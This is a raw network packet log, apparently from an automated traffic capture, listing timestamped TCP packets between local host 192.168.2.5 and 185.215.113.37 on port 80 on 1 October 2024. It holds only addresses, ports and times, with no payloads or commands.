Oct 1, 2024 16:50:08.816972017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.817049980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.817061901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.817080021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.817090034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.817100048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.817101955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.817120075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.817127943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.817131042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.817141056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.817147017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.817152023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.817162991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.817172050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.817182064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.817189932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.817189932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.817240000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861116886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861162901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861175060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861186028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861217976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861228943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861239910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861249924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861264944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861299038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861299038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861304998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861315012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861325979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861336946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861347914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861357927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861357927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861361027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861402988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861402988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861428022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861438990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861449957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861459970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861470938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861475945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861481905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861491919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861502886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861512899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861529112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861529112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861552954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861589909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861602068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861610889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861620903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861629963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861643076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861653090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861664057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861670017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861670017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861682892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861694098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861705065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861707926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861715078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861726046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861736059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861742973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861742973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861746073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861757994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861773014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861783981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861797094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861802101 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861802101 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861808062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861819029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861829042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861839056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861849070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861850023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861850023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861867905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861885071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861897945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861910105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861921072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861929893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861942053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861951113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861957073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861957073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.861962080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861972094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861983061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.861994028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.862005949 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.862005949 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.862010956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.862021923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.862031937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.862044096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.862050056 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.862054110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.862063885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:08.862085104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.862085104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.862124920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.969973087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:08.975544930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186145067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186156034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186161041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186166048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186177969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186183929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186189890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186223984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186237097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186243057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186253071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186259031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186268091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186302900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.186302900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.186363935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186371088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186376095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186379910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.186382055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186387062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186397076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186402082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186412096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186418056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186428070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186436892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.186454058 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.186491966 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.186500072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186506033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186511040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186521053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186527014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186532021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186537027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186542034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186547995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186553001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186558008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186568022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186573029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186583042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186625004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186626911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.186630964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186635971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186640024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.186640024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.186640978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186646938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186656952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186661959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186666965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186671972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186682940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186686993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186690092 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.186690092 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.186692953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.186733007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.186733007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.187016010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.187021971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.187031984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.187036991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.187041998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.187077999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.187093973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.187680006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.187738895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.188685894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188693047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188704014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188710928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188715935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188720942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188731909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188738108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188747883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188750982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.188752890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188764095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188770056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188779116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188783884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188788891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188793898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188798904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188802958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188803911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.188803911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.188808918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188813925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188818932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188822985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188826084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.188827991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188832998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188838959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188841105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.188843966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.188870907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.188982010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.189364910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189373016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189378023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189388990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189393997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189409971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189414978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189419985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189425945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189430952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189441919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189452887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.189452887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.189457893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189464092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189472914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189476013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.189479113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189483881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189488888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189493895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189508915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189513922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189524889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189531088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189536095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189542055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189543009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.189543009 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.189547062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189560890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189565897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189574957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.189584970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189589977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189600945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189604998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.189605951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189611912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189618111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189621925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.189629078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189654112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189660072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189668894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.189668894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.189671040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189676046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189686060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189691067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189707041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189712048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189717054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189723015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189723969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.189727068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189733028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189738035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189743042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189748049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189753056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189758062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189762115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.189762115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.189763069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189774036 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189785957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189789057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189791918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189795971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.189800978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.189800978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.189821005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.189935923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.190227032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190233946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190246105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190252066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190258026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190263033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190274954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190279007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190284967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190288067 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.190290928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190294981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190298080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.190300941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190306902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190311909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190315962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190321922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190325975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190330982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190337896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.190346956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190352917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190356970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190361977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190366983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190371990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190376997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190382004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190392017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.190392017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.190525055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.190573931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.190650940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.191323996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.191387892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:10.197642088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.197650909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.197657108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.197669029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:10.197750092 CEST	49704	80	192.168.2.5	185.215.113.37
